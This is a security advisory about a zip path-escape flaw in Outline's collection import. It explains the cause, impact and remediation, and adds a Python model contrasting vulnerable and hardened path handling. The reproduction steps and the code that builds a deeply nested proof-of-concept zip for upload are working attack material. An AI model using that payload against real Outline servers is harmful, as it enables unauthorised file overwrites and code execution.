Outline Zip Extraction Path Escape Vulnerability in Collection Import

Vulnerability

A path traversal vulnerability exists in Outline versions prior to 1.7.0, in the ZipHelper.extract function used by collection import. When the extraction path for a zip entry exceeds the maximum path length of 4096 bytes, the filename helper trimFileAndExt truncates it by discarding every directory component and keeping only the filename. Because the sandbox prefix is thrown away together with the rest of the directory components, what remains is a bare relative filename, and the write stream is opened relative to the process's working directory rather than inside the designated extraction sandbox. The escaped file also survives the import: the cleanup step removes only the temporary files it created, so a file written to the working directory is never deleted.

Impact

An attacker with team admin privileges can write files with attacker-chosen names and contents into the server's working directory. Overwriting application files there, such as configuration or source files, can disrupt the service, and a file that the application loads at startup would run attacker-supplied code on the next service restart, giving persistent access. Because only the basename of the zip entry survives truncation, the attacker controls the file name and contents but not the directory: what can be overwritten depends on the directory the Outline process was started from.

Reproduction

Create a zip file containing an entry whose directory nesting pushes the full extraction path (sandbox prefix plus entry name) past 4096 bytes, and upload it through the collections.import API endpoint. During extraction the path is truncated to the entry's filename, so the file is written to the server's working directory instead of the extraction sandbox. After the import completes, a file with that name remains in the working directory, which demonstrates the escape. Checking the working directory for unexpected files after a collection import is also a simple way to detect past exploitation.
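The following is an added example, not Outline's code, that models the behaviour described in the Vulnerability and Reproduction sections above. It builds the deeply nested proof-of-concept zip in memory, shows where a basename-only truncation of an over-long path would send the write (the process working directory), and contrasts it with a hardened join that rejects over-long or escaping entries instead of rewriting them. The sandbox and working-directory paths, the function names (vulnerable_destination, safe_destination, UnsafeEntry) and the sample entries are all constructed for the example; nothing is written to disk.

```python
"""Model of the collection-import path escape.

Added example, not Outline's code. PATH_MAX (4096) and the basename-only
truncation come from the advisory text; everything else is an assumption
made to keep the behaviour runnable offline.
"""
import io
import posixpath
import zipfile

PATH_MAX = 4096  # Linux limit on a full path, the threshold named in the advisory
NAME_MAX = 255   # Linux limit on a single path component


class UnsafeEntry(ValueError):
    """Raised by safe_destination for an entry that must not be written."""


def nested_entry_name(depth: int = 600, segment: str = "a" * 8,
                      filename: str = "escaped.txt") -> str:
    """Entry name whose directory chain alone is about 5.4 KiB (> PATH_MAX)."""
    return "/".join([segment] * depth + [filename])


def build_zip(entries: dict) -> bytes:
    """Build an in-memory zip; writestr stores entry names verbatim."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def vulnerable_destination(entry: str, sandbox: str, cwd: str) -> str:
    """Where the described pre-1.7.0 behaviour would open the write stream.

    An over-long path is trimmed to its basename; a bare basename is a
    relative path, so it resolves against the process working directory.
    """
    full = posixpath.join(sandbox, entry)
    if len(full.encode()) > PATH_MAX:
        trimmed = posixpath.basename(entry)   # directory components dropped
        return posixpath.join(cwd, trimmed)   # lands in cwd, outside the sandbox
    return full


def safe_destination(entry: str, sandbox: str) -> str:
    """Hardened join: every failure mode is a rejection, never a rewrite."""
    root = posixpath.normpath(sandbox)
    if entry.startswith("/") or "\\" in entry or "\x00" in entry:
        raise UnsafeEntry(f"absolute or malformed entry name: {entry[:40]!r}")
    dest = posixpath.normpath(posixpath.join(root, entry))
    if dest != root and not dest.startswith(root + "/"):
        raise UnsafeEntry(f"entry escapes sandbox: {entry[:40]!r}")
    if len(dest.encode()) > PATH_MAX:
        raise UnsafeEntry(f"path exceeds PATH_MAX ({len(dest.encode())} bytes)")
    if any(len(part.encode()) > NAME_MAX for part in dest.split("/")):
        raise UnsafeEntry("path component exceeds NAME_MAX")
    return dest


def classify(zip_bytes: bytes, sandbox: str, cwd: str) -> list:
    """Compare both strategies for every entry of a zip without writing files."""
    rows = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            row = {"entry": name, "entry_bytes": len(name.encode()),
                   "vulnerable_dest": vulnerable_destination(name, sandbox, cwd),
                   "safe_dest": None, "rejected": None}
            try:
                row["safe_dest"] = safe_destination(name, sandbox)
            except UnsafeEntry as exc:
                row["rejected"] = str(exc)
            rows.append(row)
    return rows


if __name__ == "__main__":
    sandbox = "/tmp/outline-import-sandbox"   # constructed stand-in
    cwd = "/srv/outline"                      # constructed stand-in
    poc = build_zip({nested_entry_name(): b"owned\n"})  # constructed sample
    for row in classify(poc, sandbox, cwd):
        inside = row["vulnerable_dest"].startswith(sandbox + "/")
        print(f"{row['entry_bytes']}-byte entry -> vulnerable: {row['vulnerable_dest']} "
              f"(inside sandbox: {inside}); hardened: {row['rejected'] or row['safe_dest']}")
```

The bytes returned by build_zip are what you would save to a file and upload through collections.import when reproducing against a test instance; with a real extractor the observable result is a file named escaped.txt in the working directory, matching the advisory's description. The hardened check deliberately raises on every anomaly (escape, PATH_MAX, NAME_MAX) because any attempt to "repair" a bad path is exactly the kind of rewrite that produced this bug.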

Remediation

Update to Outline version 1.7.0 or later, where this vulnerability is fixed. As a compensating control until the upgrade is applied, limit team admin accounts to trusted users and run the Outline process from a working directory that the service account cannot write to, so that an escaped write fails instead of landing next to the application.

Added: May 11, 2026, 10:33 PM
Updated: May 11, 2026, 10:33 PM

Vulnerability Rating

Custom Algorithm
spread: 3.4
impact: 0.2
exploitability: 6.3
remediation: 7.7
relevance: 8.0
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.